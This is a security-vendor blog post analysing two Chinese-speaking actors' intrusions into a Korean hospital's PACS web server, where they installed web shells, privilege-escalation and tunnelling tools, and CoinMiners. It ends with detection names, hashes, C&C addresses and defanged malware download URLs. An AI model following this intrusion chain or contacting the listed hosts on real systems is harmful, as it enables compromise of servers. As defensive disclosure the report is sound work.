Analysis of CoinMiner Attacks Targeting Korean Web Servers - ASEC BLOG (2024)

Since web servers are externally exposed to provide web services to all available users, they have been major targets for threat actors since the past. AhnLab SEcurity Intelligence Center (ASEC) is monitoring attacks against vulnerable web servers that have unpatched vulnerabilities or are being poorly managed, and is sharing the attack cases that have been confirmed through its ASEC Blog.

ASEC recently identified attack cases where a Korean medical institution was targeted, resulting in the installation of CoinMiners. The targeted web server was a Windows IIS server, and based on the path name where the web shells were uploaded, it is presumed to be a system with Picture Archiving and Communication System (PACS) installed.

PACS is a system for digitally managing and transferring medical images of patients, which is used to check and interpret the images without being restrained by time and space. This system is thus used by many hospitals. As there are multiple PACS vendors, each medical institution may use a different PACS product.

Multiple web shell upload attempts were identified on the targeted web server, and although specific details were not confirmed, it is presumed that there may be vulnerabilities in the PACS product or that the administrator did not properly configure security settings. It is believed that two threat actors carried out attacks on this server a few days apart from one another because web shell upload attacks occurred twice and no direct correlation was found between the two attacks.

Both attacks are suspected to have been carried out by Chinese-speaking threat actors, as many of the tools used, such as Cpolar and RingQ, were developed in Chinese, and Chinese annotations were identified. Notably, a significant number of attacks targeting vulnerable web servers in Korea are presumed to be cases involving Chinese-speaking threat actors.[1][2][3]

1. First Attack Case

In the initial attack identified, the threat actor used web shells such as Chopper and Behinder. After successfully uploading the web shells, the threat actor used the following commands to collect system information.

Subsequently, the threat actor installed the privilege escalation tool BadPotato and the proxy tool Cpolar through the installed web shells. Cpolar is a tunneling tool created by a Chinese developer, similar to Ngrok. These tools are typically used to expose systems located within a NAT environment to external sources, enabling threat actors to remotely access them via RDP from the outside.

The threat actor then installed a CoinMiner by first downloading the “1.cab” file. Inside the “1.cab” file were the batch script malware “1.bat”, an XML file for task scheduler registration, and a CoinMiner downloader. The downloader also downloads and installs a zip file from an external source.

Additionally, Chinese-language annotations can be found in the “1.bat” file used to install the CoinMiner. Therefore, it can be inferred that the threat actor is a Chinese-speaking user based on the use of Cpolar, which is preferred by Chinese users over Ngrok, and the presence of Chinese annotations in the attack script.

The threat actor used the aforementioned malware to install XMRig, but the actual download address contained many more types of malware. Among the web shells were Caidao and ASPXspy, and in addition to BadPotato, there were other privilege escalation tools such as GodPotato, PrintNotifyPotato, and IIS LPE (by k8gege).

Additionally, other port forwarding tools besides Cpolar, such as Frpc and Lcx, were uploaded, and there was malware designed to add user accounts for future remote access. The “useradd.exe” malware, when provided with the user account to be added as an argument, adds the account with a random password and displays the result.

2. Second Attack Case

The second attack occurred several days after the first attack. Similar to the previous case, the threat actor installed web shells such as Godzilla, Chopper, and Behinder during their initial access process. After successfully uploading the web shells, the threat actor used the following commands to collect system information.

A distinctive characteristic of the second attack was the use of Certutil to download additional malware. The threat actor installed GodPotato and PrintNotifyPotato for privilege escalation purposes along with the CVE-2021-1732 vulnerability malware. They installed the Fscan tool and a remote shell to explore the network where the infected system resides, and they installed Netcat to control the infected system. Unlike the previous case where Cpolar, Frpc, and Lcx were used, this time EarthWorm was used as a proxy tool.

Similar to the first case, the ultimate goal of the threat actor is to install a CoinMiner. Most of the ASPX files uploaded by the threat actor are web shells, but there is also an ASPX malware that acts as a downloader. This malware downloads an additional payload named “aspx.exe” from an external source and executes it. “aspx.exe” serves as a downloader that downloads and runs XMRig CoinMiner in the memory area.

3. Conclusion

Attacks targeting web servers continue to occur persistently, with recent cases observed targeting a Korean medical institution. The attacks occurred twice with a gap of several days, and based on various indicators, the threat actors in both instances are suspected to be Chinese-speaking users, with the ultimate goal of mining cryptocurrency using CoinMiner. Remote control is facilitated through installed web shells and NetCat, and given the installation of proxy tools aimed at RDP access, data exfiltration by the threat actors is a distinct possibility.

Administrators must check for the file upload vulnerability in web servers to prevent the initial access path of web shell uploads in advance. Furthermore, the password must be changed periodically and access control measures must be put in place to respond to lateral movement attacks using stolen account credentials. Also, V3 should be updated to the latest version so that malware infection can be prevented.

File Detection
– WebShell/ASP.Agent.SC200079 (2024.06.17.02)
– WebShell/ASP.Agent.SC199712 (2024.05.24.00)
– WebShell/ASP.Agent.SC199713 (2024.05.24.00)
– WebShell/ASP.Agent.SC199714 (2024.05.24.00)
– WebShell/ASP.Agent (2024.05.24.00)
– Downloader/ASP.Malurl.SC199711 (2024.05.24.00)
– WebShell/JSP.Behinder.SC188179 (2023.05.12.01)
– WebShell/ASP.Generic.S2184 (2023.03.22.03)
– WebShell/ASP.ASpy.S1362 (2021.02.02.07)
– WebShell/ASP.Generic.S1855 (2022.06.16.00)
– WebShell/ASP.Small.S1378 (2021.02.24.02)
– WebShell/ASP.Small.S1400 (2021.03.16.02)
– WebShell/ASP.Generic.S1422 (2021.03.30.03)
– WebShell/ASP.Generic.S1775 (2022.04.14.00)
– HackTool/Win.BadPotato.C4177837 (2023.09.01.00)
– Downloader/Win.Miner.C5626012 (2024.05.27.00)
– Trojan/Win.Potato.C5626014 (2024.05.27.00)
– HackTool/Win.Frpc.C5626022 (2024.05.27.00)
– HackTool/Win.Cpolar.C5641794 (2024.06.17.03)
– Trojan/Win.Miner3.R647471 (2024.05.08.02)
– Unwanted/Win.NSSM.C5625980 (2024.05.27.00)
– Downloader/Win.Miner.C5625979 (2024.05.27.00)
– HackTool/Win.RingQ.C5625987 (2024.05.27.00)
– Dropper/Win.Generic.C5624814 (2024.05.24.00)
– Trojan/Win.Generic.C5501120 (2023.10.06.03)
– Trojan/Win.AddUser.R649913 (2024.05.27.00)
– Trojan/Win.Generic.C5584377 (2024.02.05.02)
– Trojan/Win.MSILMamut.C5410538 (2023.04.13.01)
– HackTool/Win.Cpolar.C5641787 (2024.06.17.03)
– Exploit/Win.PrintNotifyPotato.R561362 (2023.08.14.00)
– HackTool/Win.Frpc.C5641788 (2024.06.17.03)
– HackTool/Win.Htran.C5626020 (2024.05.27.00)
– Exploit/Win.Consoler.R548809 (2023.01.05.03)
– HackTool/Win.LCX.C5626011 (2024.05.27.00)
– HackTool/Win32.Earthworm.C2185399 (2017.10.10.07)
– HackTool/Win.Netcat.C5355532 (2023.01.11.02)
– HackTool/Win.Netcat.C5283500 (2022.10.18.03)
– Trojan/XML.Runner (2024.06.18.00)
– CoinMiner/BAT.Agent (2024.06.18.00)
– Trojan/BAT.AddUser (2024.06.18.00)
– Trojan/BAT.AddUser (2024.06.18.00)
– HackTool/Script.Frpc (2024.06.18.00)

Behavior Detection
– Malware/MDP.Download.M1900
– Execution/MDP.NetCat.M4516

IoC
MD5
First Attack Case
– 67af0bc97b3ea18025a88a0b0201c18d: WebShell – woanware (1.aspx)
– f6591c1ab7f7b782c386af1b6c2c0e9b: WebShell – woanware (2.aspx)
– 986c8c6ee6f6a9d12a54cf84ad9b853a: WebShell – Chopper (2a.aspx)
– 2183043b19f4707f987d874ce44389e3: WebShell – Behinder (32.aspx)
– 77d507d30a155cf315f839db3bf507f7: WebShell – Behinder (1234a.aspx)
– 8d52407e143823a867c6c8330cdcb91a: WebShell – Behinder (1235a.aspx)
– 73cdd1be414dec81c6e42b83f0d04f20: WebShell – Behinder (12345a.aspx)
– 7e9f28cedfa8b012ab8646ac341a841c: BadPotato (bad1231.exe)
– 8cf601c06370612010f438fa8faa8aa7: Cpolar (cpolar.exe)
– e2753e9bc7e5880a365f035cdc5f6e77: Runner (1.bat)
– 205e6247f5a0dce8a55910354c816a61: ScheduleTask (1.xml)
– e13adb67739f4b485544ed99bc29f618: NSSM (service.exe)
– f3bdcd409063a42479dbb162dc7f5d21: CoinMiner downloader (svchost.exe)
– fce1b5ffcaefd1dcb130f4e11cdb488d: CoinMiner downloader (sihost.exe)
– a66338d9ba331efa4918e2d6397b17fe: CoinMiner (SecurityHealthServices.exe)
– 40dc8989d4b2e3db0a9e98ef7082b0d9: WebShell – ASPXspy (aspx.txt)
– b69eb0155df920514d4ae8d44316d05a: WebShell – ASPXspy (good.txt)
– 285b5f246f994b4650475db5143e4987: WebShell – Caidao (index.txt)
– 7e1a2828650e707d8142d526604f4061: BadPotato (bad.exe)
– 83b66aae624690e82c8e011e615bce59: BadPotato (bad520.exe)
– 5f3dd0514c98bab7172a4ccb2f7a152d: GodPotato (god3.exe)
– 1fdb1dd742674d3939f636c3fc4b761f: GodPotato (god4.exe)
– 493aaca456d7d453520caed5d62fdc00: PrintNotifyPotato (P2.exe)
– 493aaca456d7d453520caed5d62fdc00: PrintNotifyPotato (P3.exe)
– 7727070eb8c69773cafb09ce77492c27: PrintNotifyPotato (P4.exe)
– f7d53946b3ae7322cd018480a2f47de8: IIS LPE (iislpe.exe)
– 10cf4d43163ee395ddad1fe7e777e2c9: IIS LPE (iislpe1.exe)
– f222524766456936074f513cec2149a8: Cpolar (cpo.exe)
– d6f84855f212400314fb72d673aba27b: Frpc (F.exe)
– 62ba55ac729763037da1836b46cb84bc: Frpc (frpc.exe)
– 3c5905da1f3aecd2dccc05f6b76a1ca9: Frpc Config (frpc.txt)
– ce1f3b789b2aab2b2b833343f13b7c98: Lcx (99.exe)
– 371a2eb2800bb2beccc1a975f3073594: Lcx (Lcx.exe)
– 7abca4faa3609f86f89f1a32fe7bbcc6: UserAdder (UserAdd.exe)
– e8a7e8bb090da018b96aab3a66c7adeb: UserAdder Command (net.txt)
– 5d9464aba77e1830e1cf8d6b6e14aa55: UserAdder Command (useradd.bat)
Second Attack Case
– 71a6ba713f3f5c8e24c965487a86b5d4: WebShell – Chopper (zbngjv.aspx)
– 93abe2fcb964ec91de7d75c52d676d2d: WebShell – Chopper (bin.aspx)
– 2c3de1cefe5cd2a5315a9c9970277bd7: WebShell – Godzilla (aaa.ashx)
– 69c7d9025fa3841c4cd69db1353179cf: WebShell – Godzilla (aaa.asmx)
– 7871587d8de06edc81c163564ea4ea41: WebShell – awen (cmd.aspx)
– 10b6e46e1d4052b2ad07834604339b57: WebShell – Behinder (hi1.aspx)
– 5eeda9bfb83aacb9c3f805f5a2d41f3b: WebShell – Deleter (sklqbpbl.aspx)
– 5f3dd0514c98bab7172a4ccb2f7a152d: GodPotato (gp1.exe)
– 493aaca456d7d453520caed5d62fdc00: PrintNotifyPotato (pp.exe)
– 87562e70e958c0a0e13646f558a85d04: Privilege escalation tool – CVE-2021-1732 (aa.aspx)
– 8f7dfbec116017d632ca77be578795fd: Fscan (fscan.exe)
– 5dcf26e3fbce71902b0cd7c72c60545b: NetCat (nc.exe)
– 523613a7b9dfa398cbd5ebd2dd0f4f38: NetCat (nc64.exe)
– d76e1525c8998795867a17ed33573552: EarthWorm (ew.exe)
– 5d93629fbc80fed017e1657392a28df4: Ladon (11.exe)
– e9cb6a37c43e0393d4c656bc9f6bf556: RingQ (ringq.exe)
– 705e5d7328ae381c5063590b4f5198da: CoinMiner downloader (gzrqo.aspx)
– b81577dbe375dbc1d1349d8704737adf: CoinMiner (aspx.exe)

C&C Server URLs
– 14.19.214[.]36:6666: NetCat
– 14.19.214[.]36:3333: NetCat
– 1.119.3[.]28:7455: Frpc

Download URLs
– hxxp://sinmaxinter[.]top:7001/services.zip: CoinMiner
– hxxp://sinmaxinter[.]top:7001/C3-server25.zip: CoinMiner
– hxxp://14.19.214[.]36:6666/pp.exe: PrintNotifyPotato
– hxxp://14.19.214[.]36/aa.aspx: Privilege escalation tool – CVE-2021-1732
– hxxp://14.19.214[.]36/fscan.exe: Fscan
– hxxp://14.19.214[.]36/ew.exe: EarthWorm
– hxxp://14.19.214[.]36/11.exe: Ladon
– hxxp://14.19.214[.]36/RingQ.exe: RingQ
– hxxp://45.130.22[.]219/aspx.exe: CoinMiner
– hxxp://192.210.206[.]76/sRDI.dat: CoinMiner

Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.